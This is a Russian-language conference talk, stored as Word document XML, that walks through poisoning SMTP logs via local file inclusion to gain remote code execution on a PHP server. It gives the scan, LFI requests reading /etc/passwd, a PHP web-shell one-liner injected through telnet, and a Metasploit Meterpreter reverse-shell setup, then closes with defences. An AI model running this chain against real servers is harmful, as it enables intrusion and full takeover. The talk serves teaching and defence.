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4"/>
        </w:rPr>
        <w:t>Отравление SMTP-логов через LFI и выход на удалённое выполнение кода</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="240"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Доклад для профильной аудитории по информационной безопасности</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Вступление</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Уважаемые коллеги, добрый день! Сегодня я хочу разобрать с вами один из моих любимых примеров того, как две, казалось бы, безобидные по отдельности находки складываются в критическую уязвимость. Речь пойдёт об отравлении SMTP-логов через локальное включение файлов, которое в итоге приводит к удалённому выполнению кода на веб-сервере. Я проведу вас по всей цепочке шаг за шагом — от первого сканирования порта до полноценной интерактивной сессии на целевой системе.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Прежде чем мы начнём, обозначу суть атаки одной фразой. Если приложение разрешает подключать произвольные локальные файлы, а почтовая служба записывает в свой лог то, что мы ей отправляем, то мы можем протащить PHP-код в этот лог и заставить веб-сервер его выполнить. Давайте посмотрим, как это работает на практике.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Постановка задачи</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Перед нами типичный Linux-сервер. На нём крутится веб-приложение на PHP и работает почтовая служба SMTP, которая пишет транзакции в лог-файл /var/log/mail.log. Со стороны атакующего нам понадобится самый обычный набор инструментов, который есть у каждого из вас: Nmap для разведки, Telnet, чтобы поговорить с почтовым сервером напрямую, и Metasploit для финального аккорда. Адрес цели — 192.168.1.107, наша машина — 192.168.1.109. Запомните эти адреса, они встретятся в командах.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Шаг первый: находим точку входа</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Любая атака начинается с разведки. Нам нужно убедиться, что почтовая служба вообще слушает соединения. Один короткий запрос Nmap — и мы видим, что порт 25 открыт:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>nmap -p25 192.168.1.107</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Отлично, SMTP на месте. Это наша первая половина уязвимости — служба, которой можно подсунуть данные. Теперь ищем вторую половину.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Шаг второй: подтверждаем локальное включение файлов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Приложение принимает параметр file и, как это часто бывает, подключает файлы без какой-либо проверки. Давайте проверим это на классике жанра — попробуем прочитать файл с учётными записями, а заодно и сам почтовый лог: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192.168.1.107/lfi/lfi.php?file=/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>192.168.1.107/lfi/lfi.php?file=/var/log/mail.log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>И вот оно: сервер послушно отдаёт нам содержимое /etc/passwd и лог почты. Обратите внимание — на этом этапе многие остановились бы, записав находку как «чтение произвольных файлов». Но мы пойдём дальше, потому что именно здесь начинается самое интересное.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Шаг третий: отравляем лог</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Самое красивое в этой атаке — вот этот момент. Мы подключаемся к SMTP обычным Telnet-ом и внедряем PHP-однострочник прямо в поле адреса получателя. Сервер запишет его в лог дословно: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telnet 192.168.1.107 25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MAIL FROM:&lt;attacker@example.com&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>RCPT TO:&lt;?php system($_GET['c']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Да, в ответ мы получим ошибку «501 Bad recipient address syntax». И знаете что? Нас это совершенно не волнует. Сервер уже сделал главное — записал наш PHP-код в лог. Ошибка синтаксиса здесь не помеха, а всего лишь шум.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Шаг четвёртый: заставляем код выполниться</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>А теперь соединяем обе половины вместе. Мы включаем отравленный лог через ту самую LFI и передаём команду в параметре c. Веб-сервер читает лог, натыкается на наш PHP-код и — выполняет его:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>192.168.1.107/lfi/lfi.php?file=/var/log/mail.log&amp;c=ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Посмотрите на ответ: перед нами вывод ifconfig прямо с целевого сервера. Поздравляю — у нас в руках удалённое выполнение произвольных команд.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Шаг пятый: от одной команды к полному контролю</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Выполнять команды по одной через URL — неудобно. Поднимем полноценную оболочку с помощью модуля Metasploit web_delivery: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use exploit/multi/script/web_delivery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set target 1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set payload php/meterpreter/reverse_tcp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set lhost 192.168.1.109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set lport 8888</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Сгенерированный пейлоад вставляем в тот же параметр c — и ловим соединение обратно. Остаётся войти в сессию и осмотреться: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sessions 1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:after="120" w:before="0"/>
        <w:ind w:left="227"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>sysinfo</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Сессия Meterpreter установлена. С этого момента целевая система полностью в нашем распоряжении.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Выводы и как защититься</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Давайте подведём итог. Что мы только что увидели? Мы увидели, как уязвимость чтения файлов, которую легко недооценить, в связке с доверчивой почтовой службой превращается в полный захват сервера. Это и есть главная мысль моего доклада: оценивайте находки не по отдельности, а по тому, во что они складываются вместе.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Хорошая новость в том, что эта цепочка рвётся на любом звене. Фильтруйте параметры включения файлов и используйте белые списки. Не позволяйте веб-серверу исполнять лог-файлы как PHP. Храните логи вне корня веб-приложения и выдавайте минимально необходимые права. И очищайте данные, которые записывают в логи сетевые службы. Достаточно закрыть один из этих пунктов — и атака разваливается.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>На этом всё. Спасибо за внимание — с удовольствием отвечу на ваши вопросы.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